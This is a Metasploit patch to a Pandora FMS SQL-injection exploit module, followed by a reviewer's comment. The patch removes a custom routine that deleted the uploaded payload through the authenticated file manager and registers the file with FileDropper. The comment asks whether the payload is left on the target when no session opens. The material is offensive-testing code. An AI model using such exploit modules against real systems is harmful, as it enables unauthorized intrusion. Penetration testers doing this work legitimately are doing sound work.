From 4bbadc44d6e998f0de090541d9c7d91415fadf96 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 25 Nov 2014 22:00:42 -0600
Subject: [PATCH] Use Msf::Exploit::FileDropper
---
 .../exploits/linux/http/pandora_fms_sqli.rb | 77 +------------------
 1 file changed, 1 insertion(+), 76 deletions(-)
diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb
index 11d7293cc6..f36b51db27 100644
--- a/modules/exploits/linux/http/pandora_fms_sqli.rb
+++ b/modules/exploits/linux/http/pandora_fms_sqli.rb
@@ -281,6 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 if res && res.code == 200 && res.body.include?("Upload correct")
+ register_file_for_cleanup(@payload_name)
 print_status("#{peer} - Successfully uploaded payload")
 else
 fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
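Review bot: The file registered in the `if res && res.code == 200` branch is now removed only through FileDropper, which as far as I know deletes registered files from inside a session, so a payload that uploads but never yields a session stays in the web-served directory of the tested host. The `cleanup` removed in the second hunk deleted it through the authenticated file manager without needing a session and passed the directory extracted from the form, whereas `@payload_name` looks like a bare file name, so the delete depends on the session's working directory being the upload directory; that is not visible here. I would document this above the call, e.g. `# Removed by FileDropper once a session opens; path is resolved relative to the session's working directory`, and confirm that the class already has `include Msf::Exploit::FileDropper`, since the diffstat shows this line as the only insertion. The enclosing method starts and ends outside the hunk.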
@@ -310,80 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
 end
 end
-
-
- def cleanup
- super
- return if @rce_failed
-
- print_status("#{peer} - Cleaning script remnants")
-
- # Extract hash and hash2 from response
- res = send_request_cgi({
- 'method' => 'GET',
- 'cookie' => @cookie,
- 'uri' => normalize_uri(uri, 'index.php'),
- 'vars_get' => {
- 'sec' => 'gsetup',
- 'sec2' => 'godmode/setup/file_manager'
- }
- })
-
- if res && res.code == 200 && res.body =~ /(?<=#{@payload_name}<)(.*)(?=<\/tr>)/m
- form = $1
-
- # Extract hash
- if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
- hash = $1
- else
- print_error("#{peer} - Could not extract hash from response!")
- print_error("#{peer} - Upload will fail!")
- return false
- end
-
- # Extract hash2
- if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
- hash2 = $1
- else
- print_error("#{peer} - Could not extract hash2 from response!")
- print_error("#{peer} - Upload will fail!")
- return false
- end
-
- # Extract real_directory
- if form =~ /(?<=filename" type="hidden" value=")(.*?)(?=" \/>)/
- filepath = $1
- else
- print_error("#{peer} - Could not extract real_directory from response! Falling back to default.")
- filepath = '/var/www/html/pandora_console/images/'
- end
-
-
- else
- print_error("#{peer} - Could not identify file manager form!")
- end
-
- res = send_request_cgi({
- 'method' => 'POST',
- 'cookie' => @cookie,
- 'uri' => normalize_uri(uri, "index.php"),
- 'vars_get' => {
- 'sec' => 'gsetup',
- 'sec2' => 'godmode/setup/file_manager'
- },
- 'vars_post' => {
- 'filename' => filepath,
- 'hash' => hash,
- 'hash2' => hash2,
- 'directory' => 'images',
- 'delete_file' => 1
- }
- })
-
- if res && res.code == 200 && res.body.include?('Success')
- print_status("#{peer} - Script removed successfully")
- else
- print_warning("#{peer} - Failed to remove #{@payload_name}")
- end
- end
 end